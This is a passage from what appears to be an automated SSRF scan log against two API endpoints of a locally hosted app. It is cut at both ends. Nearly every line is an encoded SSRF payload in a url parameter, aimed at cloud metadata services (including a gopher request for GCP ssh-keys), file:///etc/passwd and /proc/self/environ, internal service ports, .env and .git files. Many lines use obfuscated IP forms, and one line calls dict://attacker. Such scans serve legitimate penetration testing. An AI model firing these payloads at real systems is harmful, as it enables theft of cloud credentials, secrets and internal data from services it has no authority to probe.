`http://localhost:4200/api/teaching_periods?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=3232235521` +- Testing: `http://localhost:4200/api/teaching_periods?url=3232235777` +- Testing: `http://localhost:4200/api/teaching_periods?url=425.510.425.510` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/teaching_periods?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=instance-data` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A22` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A443` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback%3A22` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback%3A443` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/teaching_periods?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/teaching_periods?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/teaching_periods?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/teaching_periods?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/teaching_periods?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/teaching_periods?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/teaching_periods?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/teaching_periods?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/teaching_periods?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1%3A80` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/teaching_periods?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/teaching_periods?url=2130706433%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=3232235521%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=3232235777%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/teaching_periods?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/teaching_periods?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/teaching_periods?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/teaching_periods?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/teaching_periods?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/teaching_periods?url=0%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/teaching_periods?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/tii_actions +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/tii_actions?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tii_actions?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/tii_actions?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=0` +- Testing: `http://localhost:4200/api/tii_actions?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/tii_actions?url=127.127.127.127` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.1.3` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.0` +- Testing: `http://localhost:4200/api/tii_actions?url=2130706433` +- Testing: `http://localhost:4200/api/tii_actions?url=017700000001` +- Testing: `http://localhost:4200/api/tii_actions?url=0x7f000001` +- Testing: `http://localhost:4200/api/tii_actions?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/tii_actions?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tii_actions?url=` +- Testing: `http://localhost:4200/api/tii_actions?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/tii_actions?url=` +- Testing: `http://localhost:4200/api/tii_actions?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_actions?url=` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tii_actions?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/tii_actions?url=google.com.localhost` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_actions?url=` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/tii_actions?url=` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_actions?url=` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_actions?url=localtest.me` +- Testing: `http://localhost:4200/api/tii_actions?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/tii_actions?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/tii_actions?url=2130706433%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=3232235521%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=3232235777%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/tii_actions?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/tii_actions?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/tii_actions?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tii_actions?url=0%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=localtest.me` +- Testing: `http://localhost:4200/api/tii_actions?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/tii_actions?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/tii_actions?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/tii_actions?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.1.3` +- Testing: `http://localhost:4200/api/tii_actions?url=0` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=localhost` +- Testing: `http://localhost:4200/api/tii_actions?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/tii_actions?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/tii_actions?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/tii_actions?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/tii_actions?url=7F000001` +- Testing: `http://localhost:4200/api/tii_actions?url=2130706433` +- Testing: `http://localhost:4200/api/tii_actions?url=6425673729` +- Testing: `http://localhost:4200/api/tii_actions?url=127001` +- Testing: `http://localhost:4200/api/tii_actions?url=127_0._0_1` +- Testing: `http://localhost:4200/api/tii_actions?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/tii_actions?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/tii_actions?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/tii_actions?url=localtest.me` +- Testing: `http://localhost:4200/api/tii_actions?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/tii_actions?url=127.127.127.127` +- Testing: `http://localhost:4200/api/tii_actions?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=0x7f000001` +- Testing: `http://localhost:4200/api/tii_actions?url=017700000001` +- Testing: `http://localhost:4200/api/tii_actions?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/tii_actions?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/tii_actions?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/tii_actions?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/tii_actions?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/tii_actions?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/tii_actions?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tii_actions?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254` +- Testing: `http://localhost:4200/api/tii_actions?url=2852039166` +- Testing: `http://localhost:4200/api/tii_actions?url=7147006462` +- Testing: `http://localhost:4200/api/tii_actions?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/tii_actions?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/tii_actions?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/tii_actions?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/tii_actions?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tii_actions?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tii_actions?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/tii_actions?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/tii_actions?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/tii_actions?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/tii_actions?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/tii_actions?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/tii_actions?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/tii_actions?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/tii_actions?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/tii_actions?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/tii_actions?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/tii_actions?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/tii_actions?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/tii_actions?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/tii_actions?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/tii_actions?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/tii_actions?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.0` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/tii_actions?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_actions?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tii_actions?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: 